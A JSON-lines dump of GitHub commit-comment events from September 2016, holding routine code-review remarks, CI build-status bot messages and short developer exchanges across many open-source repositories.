{"id":"4536245074","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18951661,"position":null,"line":null,"path":null,"commit_id":"6c0319fa685fecb14fe5815baa94ade2d7e48131","created_at":"2016-09-08T19:49:30Z","updated_at":"2016-09-08T19:49:30Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c0319fa685fecb14fe5815baa94ade2d7e48131-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-08T19:49:30Z"}
{"id":"4536245155","type":"CommitCommentEvent","actor":{"login":"NicholasBuse"},"repo":{"name":"opengapps/arm64"},"payload":{"comment":{"id":18951663,"position":null,"line":null,"path":null,"commit_id":"6291b4e36a9fd9f8ee31d1628ca872b02b1da2f4","created_at":"2016-09-08T19:49:31Z","updated_at":"2016-09-08T19:49:31Z","body":"@mfonville could probably give you better direction, but [https://github.com/opengapps/opengapps/commit/ac38b3dff2eef7efd04e1b87ba95b8ec6b7fad72] and [https://github.com/opengapps/opengapps/commit/545e17dc83a5d89932035eaf872e551d5df3e29b] were the opengapps updates..."}},"created_at":"2016-09-08T19:49:31Z"}
{"id":"4536250869","type":"CommitCommentEvent","actor":{"login":"abdulsamad786"},"repo":{"name":"zaincbs/PYTECH"},"payload":{"comment":{"id":18951680,"position":11,"line":11,"path":"cat.py","commit_id":"2142206ce13259d3156cc17f0f42f42f79d5704d","created_at":"2016-09-08T19:50:36Z","updated_at":"2016-09-08T19:50:36Z","body":"I am not printing any v here\n\nOn Thu, Sep 8, 2016 at 12:31 PM, zaincbs <notifications@github.com> wrote:\n\n> Return v and print it in the main.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/zaincbs/PYTECH/commit/2142206ce13259d3156cc17f0f42f42f79d5704d#commitcomment-18951378>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AK4cPqxOri6yFSRxvKV9El7HiwsBDn19ks5qoGKfgaJpZM4J4XRL>\n> .\n>\n"}},"created_at":"2016-09-08T19:50:36Z"}
{"id":"4536256899","type":"CommitCommentEvent","actor":{"login":"tardyp"},"repo":{"name":"martingkelly/bbdocs"},"payload":{"comment":{"id":18951694,"position":4,"line":211,"path":"docs/0.8.14/manual/cfg-schedulers.html","commit_id":"d9e6b2d259bbd66876475a91f9e98739e329673d","created_at":"2016-09-08T19:51:44Z","updated_at":"2016-09-08T19:51:44Z","body":"haha. no we dont write our doc in pure html :)"}},"created_at":"2016-09-08T19:51:44Z"}
{"id":"4536260375","type":"CommitCommentEvent","actor":{"login":"sopel39"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18951704,"position":112,"line":112,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-08T19:52:24Z","updated_at":"2016-09-08T19:52:24Z","body":"In Presto `.travis.yml` product test jobs groups are always excluded or included."}},"created_at":"2016-09-08T19:52:24Z"}
{"id":"4536260919","type":"CommitCommentEvent","actor":{"login":"HalosGhost"},"repo":{"name":"akheron/jansson"},"payload":{"comment":{"id":18951705,"position":null,"line":null,"path":null,"commit_id":"012c5f0ecac48db286d4d737133b6d64d128939c","created_at":"2016-09-08T19:52:30Z","updated_at":"2016-09-08T19:52:30Z","body":"Cannot tell you how excited I have been to see this release land!\r\n\r\nKeep up the awesome work!"}},"created_at":"2016-09-08T19:52:30Z"}
{"id":"4536261190","type":"CommitCommentEvent","actor":{"login":"nasthagiri"},"repo":{"name":"edx/edx-platform"},"payload":{"comment":{"id":18951706,"position":5,"line":244,"path":"lms/djangoapps/grades/tests/test_new.py","commit_id":"e52f8b7ed31cfa3471aad103825e02b3ee8be4bd","created_at":"2016-09-08T19:52:33Z","updated_at":"2016-09-08T19:52:33Z","body":"newline needed."}},"created_at":"2016-09-08T19:52:33Z"}
{"id":"4536262260","type":"CommitCommentEvent","actor":{"login":"mlblount45"},"repo":{"name":"testcontainers/testcontainers-java"},"payload":{"comment":{"id":18951710,"position":null,"line":null,"path":null,"commit_id":"7ec514f3f20afde79a64f62d0187a623121df728","created_at":"2016-09-08T19:52:45Z","updated_at":"2016-09-08T19:52:45Z","body":"@rnorth Awesome tool. anywhere we can check for what updates came in 1.1.5 any location for release notes? "}},"created_at":"2016-09-08T19:52:45Z"}
{"id":"4536262508","type":"CommitCommentEvent","actor":{"login":"sopel39"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18951712,"position":91,"line":91,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-08T19:52:49Z","updated_at":"2016-09-08T19:52:49Z","body":"did you manage to find out what was the problem?"}},"created_at":"2016-09-08T19:52:49Z"}
{"id":"4536262610","type":"CommitCommentEvent","actor":{"login":"12us"},"repo":{"name":"12us/us_training"},"payload":{"comment":{"id":18951713,"position":2,"line":2,"path":"README.md","commit_id":"d81b05e675f818a476c7080bc5594396b2aa7703","created_at":"2016-09-08T19:52:50Z","updated_at":"2016-09-08T19:52:50Z","body":"I think the description is required"}},"created_at":"2016-09-08T19:52:50Z"}
{"id":"4536262778","type":"CommitCommentEvent","actor":{"login":"abdulsamad786"},"repo":{"name":"zaincbs/PYTECH"},"payload":{"comment":{"id":18951714,"position":11,"line":11,"path":"cat.py","commit_id":"2142206ce13259d3156cc17f0f42f42f79d5704d","created_at":"2016-09-08T19:52:51Z","updated_at":"2016-09-08T19:52:51Z","body":"sorry let me do it\n\nOn Thu, Sep 8, 2016 at 12:50 PM, abdulsamad abdulrab <\nabdulsamadabdulrab@gmail.com> wrote:\n\n> I am not printing any v here\n>\n> On Thu, Sep 8, 2016 at 12:31 PM, zaincbs <notifications@github.com> wrote:\n>\n>> Return v and print it in the main.\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/zaincbs/PYTECH/commit/2142206ce13259d3156cc17f0f42f42f79d5704d#commitcomment-18951378>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AK4cPqxOri6yFSRxvKV9El7HiwsBDn19ks5qoGKfgaJpZM4J4XRL>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-08T19:52:51Z"}
{"id":"4536266813","type":"CommitCommentEvent","actor":{"login":"carrilloandre"},"repo":{"name":"carrilloandre/hello-world"},"payload":{"comment":{"id":18951719,"position":null,"line":null,"path":null,"commit_id":"3f741681c6a54d0ef680e0416781c2984b99c7cf","created_at":"2016-09-08T19:53:39Z","updated_at":"2016-09-08T19:53:39Z","body":"- Took out unnecessary period in my footer\r\n- Changed div class name from \"CR7 Fanpage\" to \"Home\""}},"created_at":"2016-09-08T19:53:39Z"}
{"id":"4536269499","type":"CommitCommentEvent","actor":{"login":"lamosty"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":18951729,"position":5,"line":15,"path":"client/state/sites/domains/assembler.js","commit_id":"1b47dd8e487dc0d476a79c1ed920276a83f8f669","created_at":"2016-09-08T19:54:11Z","updated_at":"2016-09-08T19:54:11Z","body":"This should have been in the first commit. I'll squash and merge this anyways."}},"created_at":"2016-09-08T19:54:11Z"}
{"id":"4536270354","type":"CommitCommentEvent","actor":{"login":"TheOfficialFloW"},"repo":{"name":"TheOfficialFloW/VitaShell"},"payload":{"comment":{"id":18951732,"position":null,"line":null,"path":null,"commit_id":"4d3d88891893532f291a4965482c1d511e12052d","created_at":"2016-09-08T19:54:19Z","updated_at":"2016-09-08T19:54:19Z","body":"@limyz That's an important support already, you keep the issues section clean, thank you."}},"created_at":"2016-09-08T19:54:19Z"}
{"id":"4536272985","type":"CommitCommentEvent","actor":{"login":"alinz"},"repo":{"name":"Hermanya/listenable-browser"},"payload":{"comment":{"id":18951737,"position":8,"line":35,"path":"support_for_this_browser.js","commit_id":"c343679059b3123d91c0b6f266bb4dfe96385976","created_at":"2016-09-08T19:54:49Z","updated_at":"2016-09-08T19:54:49Z","body":"@Hermanya here's the video that describe it very well. https://youtu.be/O1YP8QP9gLA?t=2066"}},"created_at":"2016-09-08T19:54:49Z"}
{"id":"4536273470","type":"CommitCommentEvent","actor":{"login":"lamosty"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":18951739,"position":25,"line":73,"path":"client/state/sites/domains/test/fixture.js","commit_id":"1b47dd8e487dc0d476a79c1ed920276a83f8f669","created_at":"2016-09-08T19:54:55Z","updated_at":"2016-09-08T19:54:55Z","body":"This is how `client/lib/domains/assembler` behaves so I left it as is."}},"created_at":"2016-09-08T19:54:55Z"}
{"id":"4536274629","type":"CommitCommentEvent","actor":{"login":"nouiz"},"repo":{"name":"Theano/Theano"},"payload":{"comment":{"id":18951743,"position":8,"line":900,"path":"doc/extending/extending_theano_c.txt","commit_id":"edfb8105e3ad08df989a4307e67e13c1d7178cd7","created_at":"2016-09-08T19:55:11Z","updated_at":"2016-09-08T19:55:11Z","body":"Add that this is useful for op that take a variable number of inputs/outputs but with a fixed maximum. Like 2 or 3 inputs.\r\n\r\nJust to make it clear when this is useful."}},"created_at":"2016-09-08T19:55:11Z"}
{"id":"4536275225","type":"CommitCommentEvent","actor":{"login":"Sam1511"},"repo":{"name":"Sam1511/t2test"},"payload":{"comment":{"id":18951745,"position":null,"line":null,"path":null,"commit_id":"a977cf4083e594b084185ae369d0cc19444f0fce","created_at":"2016-09-08T19:55:17Z","updated_at":"2016-09-08T19:55:17Z","body":"llp"}},"created_at":"2016-09-08T19:55:17Z"}
{"id":"4536276871","type":"CommitCommentEvent","actor":{"login":"lamosty"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":18951750,"position":47,"line":96,"path":"client/state/sites/domains/test/fixture.js","commit_id":"1b47dd8e487dc0d476a79c1ed920276a83f8f669","created_at":"2016-09-08T19:55:33Z","updated_at":"2016-09-08T19:55:33Z","body":"I had to move these (didn't modify) because they were using consts which were not yet defined."}},"created_at":"2016-09-08T19:55:33Z"}
{"id":"4536279250","type":"CommitCommentEvent","actor":{"login":"lamosty"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":18951757,"position":78,"line":165,"path":"client/state/sites/domains/test/fixture.js","commit_id":"1b47dd8e487dc0d476a79c1ed920276a83f8f669","created_at":"2016-09-08T19:56:01Z","updated_at":"2016-09-08T19:56:01Z","body":"Using the assembler to get the site domain object from REST API site domain response."}},"created_at":"2016-09-08T19:56:01Z"}
{"id":"4536279514","type":"CommitCommentEvent","actor":{"login":"mehdisadeghi"},"repo":{"name":"simphony/simphony-lammps"},"payload":{"comment":{"id":18951758,"position":273,"line":140,"path":"examples/simple_nve/simple_nve.py","commit_id":"354d9c28f2cf1f7fdcc34dd0946bccf9959e034e","created_at":"2016-09-08T19:56:04Z","updated_at":"2016-09-08T19:56:04Z","body":"@ahashibon `TemperatureRescaling` does not exist in the metadata. What are the specs for it?"}},"created_at":"2016-09-08T19:56:04Z"}
{"id":"4536279536","type":"CommitCommentEvent","actor":{"login":"abdulsamad786"},"repo":{"name":"zaincbs/PYTECH"},"payload":{"comment":{"id":18951759,"position":11,"line":11,"path":"cat.py","commit_id":"2142206ce13259d3156cc17f0f42f42f79d5704d","created_at":"2016-09-08T19:56:04Z","updated_at":"2016-09-08T19:56:04Z","body":"if I return v , program does not show anything during execution\n\nOn Thu, Sep 8, 2016 at 12:52 PM, abdulsamad abdulrab <\nabdulsamadabdulrab@gmail.com> wrote:\n\n> sorry let me do it\n>\n> On Thu, Sep 8, 2016 at 12:50 PM, abdulsamad abdulrab <\n> abdulsamadabdulrab@gmail.com> wrote:\n>\n>> I am not printing any v here\n>>\n>> On Thu, Sep 8, 2016 at 12:31 PM, zaincbs <notifications@github.com>\n>> wrote:\n>>\n>>> Return v and print it in the main.\n>>>\n>>> —\n>>> You are receiving this because you authored the thread.\n>>> Reply to this email directly, view it on GitHub\n>>> <https://github.com/zaincbs/PYTECH/commit/2142206ce13259d3156cc17f0f42f42f79d5704d#commitcomment-18951378>,\n>>> or mute the thread\n>>> <https://github.com/notifications/unsubscribe-auth/AK4cPqxOri6yFSRxvKV9El7HiwsBDn19ks5qoGKfgaJpZM4J4XRL>\n>>> .\n>>>\n>>\n>>\n>\n"}},"created_at":"2016-09-08T19:56:04Z"}
{"id":"4536281011","type":"CommitCommentEvent","actor":{"login":"TheRealMattiasJohansson"},"repo":{"name":"TheRealMattiasJohansson/Volumio2"},"payload":{"comment":{"id":18951763,"position":32,"line":147,"path":"app/i18n/strings_en.json","commit_id":"1b4d7220a18ca5bd3848f0ffa85327f59b084ca8","created_at":"2016-09-08T19:56:20Z","updated_at":"2016-09-08T19:56:20Z","body":"Is the blank space in the end of the string \"Downloading Plugin from \" supposed to be there?"}},"created_at":"2016-09-08T19:56:20Z"}
{"id":"4536281453","type":"CommitCommentEvent","actor":{"login":"Nigeltiany"},"repo":{"name":"klarkc/polymer-loopback-starter-kit"},"payload":{"comment":{"id":18951766,"position":null,"line":null,"path":null,"commit_id":"662ac70082b5bb06e44bb8fe1f0f52605a2af2a0","created_at":"2016-09-08T19:56:25Z","updated_at":"2016-09-08T19:56:25Z","body":"Thank you so much @klarkc. For your time, patience and knowledge. I appreciate. I'll look into this and let you know when i fix it."}},"created_at":"2016-09-08T19:56:25Z"}
{"id":"4536282918","type":"CommitCommentEvent","actor":{"login":"oryani"},"repo":{"name":"oryani/github-for-web-designers"},"payload":{"comment":{"id":18951770,"position":5,"line":29,"path":"index.html","commit_id":"24412f07fe6091fd954ea1cdccb348d6d49e39a6","created_at":"2016-09-08T19:56:41Z","updated_at":"2016-09-08T19:56:41Z","body":"Hi, do not worry, this is a comment for this!"}},"created_at":"2016-09-08T19:56:41Z"}
{"id":"4536285186","type":"CommitCommentEvent","actor":{"login":"carrilloandre"},"repo":{"name":"carrilloandre/hello-world"},"payload":{"comment":{"id":18951777,"position":null,"line":null,"path":null,"commit_id":"e5d8dc526900eb6708bcc12b527423fde7099ffd","created_at":"2016-09-08T19:57:08Z","updated_at":"2016-09-08T19:57:08Z","body":"- Changed \"fromm\" to \"from\""}},"created_at":"2016-09-08T19:57:08Z"}
{"id":"4536286062","type":"CommitCommentEvent","actor":{"login":"lamosty"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":18951779,"position":21,"line":37,"path":"client/state/sites/domains/test/selectors.js","commit_id":"1b47dd8e487dc0d476a79c1ed920276a83f8f669","created_at":"2016-09-08T19:57:16Z","updated_at":"2016-09-08T19:57:16Z","body":"I have to test for the second domain because it gets different `type` than it receives from REST API thanks to the `getDomainType` fn."}},"created_at":"2016-09-08T19:57:16Z"}
{"id":"4536288149","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18951784,"position":null,"line":null,"path":null,"commit_id":"6c0319fa685fecb14fe5815baa94ade2d7e48131","created_at":"2016-09-08T19:57:39Z","updated_at":"2016-09-08T19:57:39Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2300 of 2466 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c0319fa685fecb14fe5815baa94ade2d7e48131-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c0319fa685fecb14fe5815baa94ade2d7e48131-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.27%25-yellow.svg)</a> \n"}},"created_at":"2016-09-08T19:57:39Z"}
{"id":"4536292639","type":"CommitCommentEvent","actor":{"login":"sharedprophet"},"repo":{"name":"sharedprophet/git-plus"},"payload":{"comment":{"id":18951796,"position":null,"line":null,"path":null,"commit_id":"67a037b2c61ee64044c03271cd58e84a7afaf584","created_at":"2016-09-08T19:58:31Z","updated_at":"2016-09-08T19:58:31Z","body":"Cool."}},"created_at":"2016-09-08T19:58:31Z"}
{"id":"4536294919","type":"CommitCommentEvent","actor":{"login":"mehdisadeghi"},"repo":{"name":"simphony/simphony-lammps"},"payload":{"comment":{"id":18951803,"position":286,"line":153,"path":"examples/simple_nve/simple_nve.py","commit_id":"354d9c28f2cf1f7fdcc34dd0946bccf9959e034e","created_at":"2016-09-08T19:58:59Z","updated_at":"2016-09-08T19:58:59Z","body":"`IntegrationTime` does not exist in the metadata."}},"created_at":"2016-09-08T19:58:59Z"}
{"id":"4531367505","type":"CommitCommentEvent","actor":{"login":"justudy81"},"repo":{"name":"justudy81/test"},"payload":{"comment":{"id":18938718,"position":null,"line":null,"path":null,"commit_id":"3b289112f00f9165f4d9c4cfa623d6cbe438ee7b","created_at":"2016-09-08T02:00:35Z","updated_at":"2016-09-08T02:00:35Z","body":"testing"}},"created_at":"2016-09-08T02:00:35Z"}
{"id":"4531367623","type":"CommitCommentEvent","actor":{"login":"adrilo"},"repo":{"name":"LukasJenicek/spout"},"payload":{"comment":{"id":18938719,"position":32,"line":140,"path":"src/Spout/Writer/XLSX/Internal/Worksheet.php","commit_id":"ce3aa50dd9281ce1dc8a26b07bf1d5bb139a54cf","created_at":"2016-09-08T02:00:38Z","updated_at":"2016-09-08T02:00:38Z","body":"What's the $key here?"}},"created_at":"2016-09-08T02:00:38Z"}
{"id":"4531370342","type":"CommitCommentEvent","actor":{"login":"KinshukBasu"},"repo":{"name":"KinshukBasu/CSC522"},"payload":{"comment":{"id":18938732,"position":null,"line":null,"path":null,"commit_id":"0eb8b5d99f62c7517edf9254e123e47c2c9db6e4","created_at":"2016-09-08T02:01:28Z","updated_at":"2016-09-08T02:01:28Z","body":"Calculates various distance measures for given data, needs locations.csv in the same folder"}},"created_at":"2016-09-08T02:01:28Z"}
{"id":"4531370687","type":"CommitCommentEvent","actor":{"login":"adrilo"},"repo":{"name":"LukasJenicek/spout"},"payload":{"comment":{"id":18938735,"position":57,"line":211,"path":"src/Spout/Writer/XLSX/Internal/Worksheet.php","commit_id":"ce3aa50dd9281ce1dc8a26b07bf1d5bb139a54cf","created_at":"2016-09-08T02:01:35Z","updated_at":"2016-09-08T02:01:35Z","body":"so the cell widths can come **after** the sheet data?"}},"created_at":"2016-09-08T02:01:35Z"}
{"id":"4531372922","type":"CommitCommentEvent","actor":{"login":"adrilo"},"repo":{"name":"LukasJenicek/spout"},"payload":{"comment":{"id":18938739,"position":22,"line":22,"path":"src/Spout/Writer/XLSX/Cell/XlsxCellWidthCalculator.php","commit_id":"ce3aa50dd9281ce1dc8a26b07bf1d5bb139a54cf","created_at":"2016-09-08T02:02:18Z","updated_at":"2016-09-08T02:02:18Z","body":"Simple :P"}},"created_at":"2016-09-08T02:02:18Z"}
{"id":"4531377506","type":"CommitCommentEvent","actor":{"login":"GalvinGao"},"repo":{"name":"antoor/antSword"},"payload":{"comment":{"id":18938745,"position":null,"line":null,"path":null,"commit_id":"bec79d44b9f63f4195e2634793de589ea9a3c19a","created_at":"2016-09-08T02:03:54Z","updated_at":"2016-09-08T02:03:54Z","body":"这是- -为了什么QAQ"}},"created_at":"2016-09-08T02:03:54Z"}
{"id":"4531379893","type":"CommitCommentEvent","actor":{"login":"adrilo"},"repo":{"name":"LukasJenicek/spout"},"payload":{"comment":{"id":18938748,"position":36,"line":144,"path":"src/Spout/Writer/XLSX/Internal/Worksheet.php","commit_id":"ce3aa50dd9281ce1dc8a26b07bf1d5bb139a54cf","created_at":"2016-09-08T02:04:43Z","updated_at":"2016-09-08T02:04:43Z","body":"the writer should definitely not be part of the external sheet interface. It's a private implementation and should not be exposed"}},"created_at":"2016-09-08T02:04:43Z"}
{"id":"4531382944","type":"CommitCommentEvent","actor":{"login":"adrilo"},"repo":{"name":"LukasJenicek/spout"},"payload":{"comment":{"id":18938754,"position":15,"line":89,"path":"src/Spout/Writer/XLSX/Internal/Workbook.php","commit_id":"ce3aa50dd9281ce1dc8a26b07bf1d5bb139a54cf","created_at":"2016-09-08T02:05:50Z","updated_at":"2016-09-08T02:05:50Z","body":"I'd move the writer to the Worksheet instead. Or maybe move it at the writer level so instead of having the option per sheet, it would apply to all sheets"}},"created_at":"2016-09-08T02:05:50Z"}
{"id":"4531386108","type":"CommitCommentEvent","actor":{"login":"sudhansk"},"repo":{"name":"atokasema/yavijava"},"payload":{"comment":{"id":18938763,"position":null,"line":null,"path":null,"commit_id":"8cde6ae1a972c02edf3af985fdaa2ba80795f906","created_at":"2016-09-08T02:06:57Z","updated_at":"2016-09-08T02:06:57Z","body":"I'm also getting \"com.vmware.vim25.SecurityError\".\r\nI've also tried hello_world_yavijava_spbm but got same error.\r\n\r\nHow to fix this error ?\r\nThanks in advance for help."}},"created_at":"2016-09-08T02:06:57Z"}
{"id":"4531388909","type":"CommitCommentEvent","actor":{"login":"xiayuan"},"repo":{"name":"xiayuan/kaggle"},"payload":{"comment":{"id":18938766,"position":5,"line":7,"path":"script.py","commit_id":"49aba49580ea8edc1d6713451cf54755534a6313","created_at":"2016-09-08T02:07:55Z","updated_at":"2016-09-08T02:07:55Z","body":"change for test"}},"created_at":"2016-09-08T02:07:55Z"}
{"id":"4531392198","type":"CommitCommentEvent","actor":{"login":"christoga"},"repo":{"name":"links-js/db"},"payload":{"comment":{"id":18938769,"position":null,"line":null,"path":null,"commit_id":"09a4faf01565a774b7eaf9821aafb5cbdea3d03f","created_at":"2016-09-08T02:09:01Z","updated_at":"2016-09-08T02:09:01Z","body":"Dude, this project is really good.\nThe problem is, there isn't a lot of people who know this project.\n\nYou can probably tell your coworkers😉"}},"created_at":"2016-09-08T02:09:01Z"}
{"id":"4531392708","type":"CommitCommentEvent","actor":{"login":"breeswish"},"repo":{"name":"vijos/vj4"},"payload":{"comment":{"id":18938770,"position":null,"line":null,"path":null,"commit_id":"402a77d2a316bdab1437dd2f69f990827c5586d6","created_at":"2016-09-08T02:09:11Z","updated_at":"2016-09-08T02:09:11Z","body":"As shown in the code, we use gravatar proxy provided by USTC LUG. Please refer to USTC LUG gravatar TOS to see if you can use it as well."}},"created_at":"2016-09-08T02:09:11Z"}
{"id":"4531395374","type":"CommitCommentEvent","actor":{"login":"Tuxity"},"repo":{"name":"lemonlatte/goradar-api"},"payload":{"comment":{"id":18938776,"position":35,"line":35,"path":"main.go","commit_id":"82236dd9e43cc025246e9f2f3291e4334d95705b","created_at":"2016-09-08T02:10:08Z","updated_at":"2016-09-08T02:10:08Z","body":"Yep I know, but how to generate it from our side? You know which security\nalgorithm it is?\n\n\nOn 7 de septiembre de 2016 at 20:57:47, Jim Yeh (notifications@github.com)\nwrote:\n\n> The time/hash/key pair is generated from android/ios apps. And each pair\n> will expired in a period of time.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/lemonlatte/goradar-api/commit/82236dd9e43cc025246e9f2f3291e4334d95705b#commitcomment-18938695>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAB7eGM0HRsNsiq7N25oBNZYFCMoE9u1ks5qn2ubgaJpZM4J3cY2>\n> .\n>\n"}},"created_at":"2016-09-08T02:10:08Z"}
{"id":"4531398070","type":"CommitCommentEvent","actor":{"login":"marcioAlmada"},"repo":{"name":"brzuchal/php-src"},"payload":{"comment":{"id":18938781,"position":13,"line":734,"path":"Zend/zend_object_handlers.c","commit_id":"ee4c58fb71cc1b655de9c7605a67831f327c4527","created_at":"2016-09-08T02:11:01Z","updated_at":"2016-09-08T02:11:01Z","body":"we're having false positives here somehow"}},"created_at":"2016-09-08T02:11:01Z"}
{"id":"4531398070","type":"CommitCommentEvent","actor":{"login":"marcioAlmada"},"repo":{"name":"brzuchal/php-src"},"payload":{"comment":{"id":18938781,"position":13,"line":734,"path":"Zend/zend_object_handlers.c","commit_id":"ee4c58fb71cc1b655de9c7605a67831f327c4527","created_at":"2016-09-08T02:11:01Z","updated_at":"2016-09-08T02:11:01Z","body":"we're having false positives here somehow"}},"created_at":"2016-09-08T02:11:01Z"}
{"id":"4531400104","type":"CommitCommentEvent","actor":{"login":"abhijit-mahajani-imgtec"},"repo":{"name":"nikhil-zinjurde-imgtec/button-led-controller"},"payload":{"comment":{"id":18938790,"position":null,"line":null,"path":null,"commit_id":"dd2690080ba3e48256843b38c6ef3aea40d8d204","created_at":"2016-09-08T02:11:44Z","updated_at":"2016-09-08T02:11:44Z","body":"Approved"}},"created_at":"2016-09-08T02:11:44Z"}
{"id":"4531401197","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18938791,"position":null,"line":null,"path":null,"commit_id":"0d1cea1a9df60b26925a2c0e67f3c5ff786338a3","created_at":"2016-09-08T02:12:08Z","updated_at":"2016-09-08T02:12:08Z","body":"TeamCity Ms Demo :: Build [Build 36](http://10.22.17.95:8111/viewLog.html?buildId=61&buildTypeId=MsDemo_Build) is now running\n"}},"created_at":"2016-09-08T02:12:08Z"}
{"id":"4531403654","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18938800,"position":null,"line":null,"path":null,"commit_id":"813de8e15cd48f37f068ebc873789cf8634fb822","created_at":"2016-09-08T02:12:54Z","updated_at":"2016-09-08T02:12:54Z","body":"Are there calls that fail this?  That seems like a mistake?\r\n\r\n`simplify_assuming` was previously not called on things that contained 'h'.  That seemed like a good idea."}},"created_at":"2016-09-08T02:12:54Z"}
{"id":"4531404594","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18938805,"position":null,"line":null,"path":null,"commit_id":"0d1cea1a9df60b26925a2c0e67f3c5ff786338a3","created_at":"2016-09-08T02:13:14Z","updated_at":"2016-09-08T02:13:14Z","body":"TeamCity Ms Demo :: Build [Build 36](http://10.22.17.95:8111/viewLog.html?buildId=61&buildTypeId=MsDemo_Build) outcome was **SUCCESS**\nSummary: Tests passed: 6 Build time: 00:01:07"}},"created_at":"2016-09-08T02:13:14Z"}
{"id":"4531406071","type":"CommitCommentEvent","actor":{"login":"Seeebastian"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18938807,"position":null,"line":null,"path":null,"commit_id":"b0381a687687c8263f59bbb4450c44284587fccc","created_at":"2016-09-08T02:13:45Z","updated_at":"2016-09-08T02:13:45Z","body":"Did #44 "}},"created_at":"2016-09-08T02:13:45Z"}
{"id":"4531406513","type":"CommitCommentEvent","actor":{"login":"Seeebastian"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18938808,"position":null,"line":null,"path":null,"commit_id":"8cc4222f3c86869a21e097bf3310f68dbf7abf81","created_at":"2016-09-08T02:13:55Z","updated_at":"2016-09-08T02:13:55Z","body":"Did #44"}},"created_at":"2016-09-08T02:13:55Z"}
{"id":"4531409000","type":"CommitCommentEvent","actor":{"login":"MustafaAbdelmonem"},"repo":{"name":"MustafaAbdelmonem/First-commit-Final-App"},"payload":{"comment":{"id":18938811,"position":null,"line":null,"path":null,"commit_id":"22034de74946063ef49d4e82607f45f772bbd4b1","created_at":"2016-09-08T02:14:51Z","updated_at":"2016-09-08T02:14:51Z","body":"+include ':app'"}},"created_at":"2016-09-08T02:14:51Z"}
{"id":"4531414388","type":"CommitCommentEvent","actor":{"login":"MustafaAbdelmonem"},"repo":{"name":"MustafaAbdelmonem/First-commit-Final-App"},"payload":{"comment":{"id":18938819,"position":null,"line":null,"path":null,"commit_id":"22034de74946063ef49d4e82607f45f772bbd4b1","created_at":"2016-09-08T02:16:43Z","updated_at":"2016-09-08T02:16:43Z","body":"@@ -0,0 +1 @@\r\n +/build"}},"created_at":"2016-09-08T02:16:43Z"}
{"id":"4531414685","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18938820,"position":null,"line":null,"path":null,"commit_id":"18471743926470e6981d3ca0f07bd259df846441","created_at":"2016-09-08T02:16:50Z","updated_at":"2016-09-08T02:16:50Z","body":"Agreed (on the form of the documentation).  See why you're not ready to write it."}},"created_at":"2016-09-08T02:16:50Z"}
{"id":"4531419875","type":"CommitCommentEvent","actor":{"login":"MustafaAbdelmonem"},"repo":{"name":"MustafaAbdelmonem/First-commit-Final-App"},"payload":{"comment":{"id":18938822,"position":null,"line":null,"path":null,"commit_id":"22034de74946063ef49d4e82607f45f772bbd4b1","created_at":"2016-09-08T02:18:50Z","updated_at":"2016-09-08T02:18:50Z","body":" @@ -0,0 +1  @@\r\n +/build"}},"created_at":"2016-09-08T02:18:50Z"}
{"id":"4531430886","type":"CommitCommentEvent","actor":{"login":"alexvins"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":18938845,"position":null,"line":null,"path":null,"commit_id":"78a560767bce07f25b07b4b55e02a232269b393f","created_at":"2016-09-08T02:22:58Z","updated_at":"2016-09-08T02:22:58Z","body":"What if both price and total bonus value equals? Infinite loop again?"}},"created_at":"2016-09-08T02:22:58Z"}
